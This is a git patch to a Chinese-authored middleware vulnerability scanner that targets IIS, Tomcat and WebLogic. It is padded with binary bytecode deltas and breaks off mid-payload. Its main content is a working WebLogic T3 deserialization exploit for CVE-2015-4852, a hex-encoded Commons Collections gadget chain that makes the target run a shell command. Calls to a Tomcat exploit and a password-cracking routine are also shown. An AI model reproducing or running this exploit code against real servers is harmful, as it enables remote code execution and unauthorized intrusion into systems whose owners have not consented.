From 71670dcad65a89a6dc908709a07ef76965b5b9d2 Mon Sep 17 00:00:00 2001 From: nihaohello <34113556+nihaohello@users.noreply.github.com> Date: Sun, 31 Mar 2019 15:47:11 +0800 Subject: [PATCH] 1 --- N-MiddlewareScan.py | 45 ++++++++++----- __pycache__/config.cpython-37.pyc | Bin 342 -> 360 bytes config.py | 1 + plugins/IIS_special_plugin_.py | 7 ++- plugins/__init__.py | 0 .../IIS_special_plugin_.cpython-37.pyc | Bin 1493 -> 1592 bytes plugins/__pycache__/__init__.cpython-37.pyc | Bin 0 -> 157 bytes plugins/__pycache__/plugins.cpython-37.pyc | Bin 4225 -> 4225 bytes .../special_plugin_.cpython-37.pyc | Bin 1271 -> 1256 bytes .../tomcat_special_plugin_.cpython-37.pyc | Bin 3132 -> 3326 bytes .../weblogic_special_plugin_.cpython-37.pyc | Bin 1607 -> 1191 bytes plugins/special_plugin_.py | 2 +- plugins/tomcat_special_plugin_.py | 13 ++++- plugins/weblogic_poc/CVE_2015_4852.py | 52 +++++++++--------- plugins/weblogic_poc/CVE_2016_0638.py | 20 ++++--- plugins/weblogic_poc/CVE_2016_3510.py | 20 ++++--- plugins/weblogic_poc/CVE_2017_3248.py | 20 ++++--- plugins/weblogic_poc/CVE_2017_3506.py | 9 ++- plugins/weblogic_poc/CVE_2018_2628.py | 22 +++++--- plugins/weblogic_poc/CVE_2018_2893.py | 23 ++++---- .../__pycache__/CVE_2015_4852.cpython-37.pyc | Bin 4462 -> 4591 bytes .../__pycache__/CVE_2016_0638.cpython-37.pyc | Bin 11024 -> 11145 bytes .../__pycache__/CVE_2016_3510.cpython-37.pyc | Bin 11041 -> 11143 bytes .../__pycache__/CVE_2017_3248.cpython-37.pyc | Bin 10996 -> 11098 bytes .../__pycache__/CVE_2017_3506.cpython-37.pyc | Bin 2528 -> 2603 bytes .../__pycache__/CVE_2018_2628.cpython-37.pyc | Bin 7184 -> 7286 bytes .../__pycache__/CVE_2018_2893.cpython-37.pyc | Bin 7405 -> 7507 bytes .../__pycache__/managerURL200.cpython-37.pyc | Bin 1270 -> 1351 bytes .../__pycache__/uddi_ssrf.cpython-37.pyc | Bin 1227 -> 1306 bytes plugins/weblogic_poc/managerURL200.py | 13 +++-- plugins/weblogic_poc/uddi_ssrf.py | 12 ++-- plugins/weblogic_special_plugin_.py | 40 ++++++++++---- test.py | 4 ++ 33 files changed, 190 insertions(+), 113 deletions(-) create mode 100644 plugins/__init__.py create mode 100644 plugins/__pycache__/__init__.cpython-37.pyc create mode 100644 test.py diff --git a/N-MiddlewareScan.py b/N-MiddlewareScan.py index b3ab397..d7498b1 100644 --- a/N-MiddlewareScan.py +++ b/N-MiddlewareScan.py @@ -4,18 +4,20 @@ #blog:http://www.youknowi.xin import sys import os +import re import argparse import traceback import config +import multiprocessing from concurrent.futures import ThreadPoolExecutor from plugins import plugins #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080 class MiddlewareScan(object): - def __init__(self,arg,ThreadNum): + def __init__(self,arg,config): self.arg=arg - self.ThreadNum=ThreadNum + self.config=config def run(self): - P = plugins.plugins(self.arg,self.ThreadNum) + P = plugins.plugins(self.arg,self.config) P.run() def main(): arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete') @@ -24,31 +26,44 @@ def main(): arg.add_argument('-p', '--options', help='options', dest='options') arg.add_argument('-t', '--thread', help='thread num', dest='thread') arg = arg.parse_args() + if len(sys.argv)<=2: + os.system("python "+sys.argv[0]+" -h") + exit() + print("开始检测中间件相关漏洞:") if arg.thread: config.ThreadNum=arg.thread if not arg.options: arg.options="all" if arg.url: + if not re.match(r'^https?:/{2}\w.+$', url): + print("输入标准的url,如:http://www.baidu.com") + exit() try: S=MiddlewareScan(arg,config) S.run() except Exception: print(traceback.print_exc()) if arg.file: + multiprocessing_list=[] + f = open(arg.file, encoding="utf-8") + for url in f.readlines(): + url = url.rstrip("\n") + arg.url = url + if not re.match(r'^https?:/{2}\w.+$', url): + if not url.startswith("http"): + arg.url="http://"+url + S = MiddlewareScan(arg, config) + multiprocessing_list.append(S.run()) + f.close() + pool=multiprocessing.Pool(config.Process) try: - with open(arg.file,encoding="utf-8") as f: - with ThreadPoolExecutor(config.ThreadNum) as excetor: - for url in f.readlines(): - try: - url=url.rstrip("\n") - S=MiddlewareScan(arg,config) - excetor.submit(S.run()) - except Exception: - pass - f.close() + #pool.apply_async(multiprocessing_list) + for i in multiprocessing_list: + pool.apply_async(i) + pool.close() + pool.join() except Exception: print(traceback.print_exc()) print("\n\n相关漏洞检测完成。") if __name__ == '__main__': - print("开始检测中间件相关漏洞:") -main() \ No newline at end of file + main() \ No newline at end of file diff --git a/__pycache__/config.cpython-37.pyc b/__pycache__/config.cpython-37.pyc index 9cdb7ba97ffe7c802f7b1263e799d39d5287ebd7..6b1067efb6dfdff0eb464cd4bc6de6d0983854be 100644 GIT binary patch delta 114 zcmcb{^n!`kiIZRPoC2Oh3loFN%Ssfj6mrMVM# nIB~NAl@@`BUv`sO8C974bSG;vs*4E$MOYYtkOxeHSU?B>lCu*+ diff --git a/config.py b/config.py index af1cdab..28433e9 100644 --- a/config.py +++ b/config.py @@ -1,4 +1,5 @@ ThreadNum=50 +Process=30 Timeout=6 port=80 #linux diff --git a/plugins/IIS_special_plugin_.py b/plugins/IIS_special_plugin_.py index 0cd709b..895c479 100644 --- a/plugins/IIS_special_plugin_.py +++ b/plugins/IIS_special_plugin_.py @@ -38,5 +38,8 @@ def IIS_shortname_Scanner(url): except Exception as e: raise Exception('[is_vul.Exception] %s' % str(e)) def IIS_special_plugin_(arg,config): - IIS_PUT(arg,config) - IIS_shortname_Scanner(arg.url) \ No newline at end of file + try: + IIS_PUT(arg,config) + IIS_shortname_Scanner(arg.url) + except Exception: + pass \ No newline at end of file diff --git a/plugins/__init__.py b/plugins/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc index d1e159db06da0e26e1a140164250f253ab16f25a..26b24af241c7c4ff659e330a7d2048b8c2ff6c0a 100644 GIT binary patch delta 444 zcmYk2&r1S96vyA2U02<9)%*d1QJ11N^b+AAp+nKZOArPc1hUwYmaQ^wkf8>74{RhyRVD>f%_lSHWyWfnnhpNHs5VBxW)@}zt;BSn!Sr?D81$T})TaxKi0@aJhe swT7K(R@=?n%Z6LsqMnZb^+c=_X+-P=PS^gUSN=j4;>0wtp+rNmU-Va1$N&HU delta 355 zcmdnNbCsLdiI`CX8?(bi*y;oCSEX`Y{IyLkz?{* zMl&W&w#f=i>YOVXiUfcPeg#hsW>R7D)16$-WGx{C6k%XwV`O0zVB}%sVB}-uViaI1 z5}JI0=`o}5g0RwSnulw{`TO|D|m)Vjr(3N{Er2m9jxWy0FDl7P z%uS6CPEO3rODz(ee4fRmo*AeB>^cb`qlBS`p@y-UiIJg%v4$awshN?HA%!8BL6gx> zleq}wm?CKq0n((&RKyEn^MMGE%aJS;23uH=nw*)K6JL;1nx2^#uL@LB%mO4BfPN^F h0n(a0MQoFovwF!R3g`k0^almF(CReh=2h`Aj1KOi&=m~3PUi1CZpdzkR9l9O7VSd2><{s(FEN9 delta 20 ZcmZovY*gfS;^pOH0D}D5`5U>*1OO{G1cLwo diff --git a/plugins/__pycache__/special_plugin_.cpython-37.pyc b/plugins/__pycache__/special_plugin_.cpython-37.pyc index b10a91761cd55ea042b868c7137cb6471886c259..2c353c5181f72c5999e2547f98fb1f34bae63ed8 100644 GIT binary patch delta 143 zcmey)`GS+ziIj$xt%F+@_i;fM$yT9 g%pGiEj9iRG;+y9%%P@+H11&2OMJ2>0pJmYk08R^*&BUkai?+0amtIQKf`>v5T8Is;kamI^W!2d|SlH+x z(!1;*SfRI`O0M2|EIstPzoF27Aimi^XZXJP=6i46d(3U~ZYgNj>ymhVf0lpvGj|;{ z@%4Ij_X#N+`#oRT%DJLmT~(FKXRt-8rsNeVITpPc zX20zftWEyekw9y*=l%sYvbQoqJG=81FZDY2e9njklZ*2H*=VzDMvd{B5nnLv(@3Nu zrv$l3Dr3s6l!o>V%m)3BI4PwVi>Z75G!<{?V{26T;-{6odPATtoxQLqaW9Xg-UAz; z_iXJlx^zBYKJZ6YYUMSPem3lqq8$p+31#8*PfrJtDr(7r9`w~=v|l*yN?A^?+dQZ? zW9v1h!j6-^PV}PD*6`#o3T+*l=sZz_it4mVTsTuvV3@t~Rv&M3O3W!lu&|5;NC@}{ x_>|Bc_QSa>^3Q=7Dh%!>B(1F6&bZQe`n2OVpQFn#_@)c z(QtAwS01C|s5h9Qe- zAtNJ033ClY4P!GCBSQ*9FoPzepC$`fe~}|lX%Q!g&;k;gOhp>MllPJU|{59EOG_XngWx}dF&ZYCYSRV2`B*tz~(^Ab_KdyO#)<=1S1C+@-TuR KhY*J-pCSM!#W;xo diff --git a/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc index 49f48570c6e873d6f9a60286826b54a76157fb7e..983bd45e098a08fb6a08544d8566add54f1850e3 100644 GIT binary patch delta 592 zcmZ`$O-lkn7@k>Yzdy7BUCKTv!uAk`hYk@Q%5#?jDJl>~{J>V5T}focONWlh{(;>~ zQh%aj=dMFPp&!w#imZV%JP*&j&-*dVd}(9ZIMa0nu=R5o-173sFyYH6*GmGdwA33F zt5|ymH`?g!!w^}P%y7=&9Q*fhdsqVln$d?2`DAbAOo3%L-65Q2GJp2jf>6aO4# zsiQ7+wAhqke2l)d#8~PiW6k2dQj76k+CwF9XAF3c4^~0|!7F@}%Ahzm1WyQ7XU0w$ zU~ma6{-SZc0YG1@yKd(spYKbNaF`;HJ)yPc*U{cS6)K%h)y7nI>!e!24ZB8#tBE8W zOQQ+Wwf!+VNK)Q$E5xO!*>2dD=zpV(NyTZELxriJu=x&1*8fFM1wHzxT}A*RXil&W zqixRE

N?h8)>qS(fg9@})wGNuov+1xa?1HrbI%rw?u1ZB>iW4V|=qBxE=V{sB1j BkB0yN literal 1607 zcmaJ>&rj4q6rSm?ZM(a;Aw-E9<8=?fvdgY3F~*1_9*~1Xg@&XlZCMK4wwcZbmO!GB z#486c8WP!?CjJHf4W2xiUX4cn1y8=|N@>B;$-MdYecw#qzIm??%Vib8bNK4RswE-x zgZ(&tH~>5EP_MB=m7ZledKi-R zMU$n9JpxP_<{ZrM8-}#ueU74IyoWZqW8UHh7%V@)1H8}oD^xfZ_xL?-0Ev8oyqf}| z(w0gdW5fn6Si);a_X_g3Wz-*~@=$Gw14wpCzmw>tj9$sne@yg+j9$&re^2ysN?)PH zO!T*g(H~+0*U1LNucY*&v~=$LvmLX^4mGo*oV&wKb`(=PDs&_#rlUk(%IL4;=)WfV z@|oU3P>3Uo&dLphb_*Mn2D4LByD|eIpx$+M_37%o{rlkkucOaD-+VcF`;I_8ptNRK zuo+F3X62hp4~zLS8cI8t9@h0`H1xqmI@1JM`YQW(r!A48s+C9zeRIpEQMqH&4L_u7 zeb4CH5#J+jB!-kY0bxB9@ucTP%KVOL2h{PsNDPSMQNja9SaT7P8Te8m!upI9m{FKv z-?6F?@doKclIeTvPA3uqpU{YNf=`IB@ct}6nq3Y0=7vGK69MrzZIiApPCRie%eA)+ zVlSD7chM2Jy^iCBtK0UP>vtSe4+GnD3|Ai#`ee|L#`DM$yf<6`gRp?dISyCw2n-I7 z=B$-i!FZ-TTTlILCF5{jwWN*x3vDuad*GXKCjXnVI9qYvl9Z7moD?4yXDDT^0TIdf Uy1vzO?fdL@!Z9!连接超时", "cyan") def tomcat_special_plugin_(arg,config): - Exploit().attack(arg.url) - crack_password(arg,config) + threads=[] + threads.append(threading.Thread(Exploit().attack(arg.url))) + threads.append(threading.Thread(crack_password(arg,config))) + for thread in threads: + try: + thread.start() + except Exception: + pass + for j in threads: + j.join() diff --git a/plugins/weblogic_poc/CVE_2015_4852.py b/plugins/weblogic_poc/CVE_2015_4852.py index d2982d1..3154bd6 100644 --- a/plugins/weblogic_poc/CVE_2015_4852.py +++ b/plugins/weblogic_poc/CVE_2015_4852.py @@ -13,45 +13,43 @@ import struct from binascii import unhexlify def run(rip,rport): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server_address = (rip,rport) - sock.connect(server_address) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(7) + server_address = (rip, rport) + sock.connect(server_address) - headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' - sock.sendall(headers) + headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' + sock.sendall(headers) - data = sock.recv(1024) + data = sock.recv(1024) - chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + chunk1 = '\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" - chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6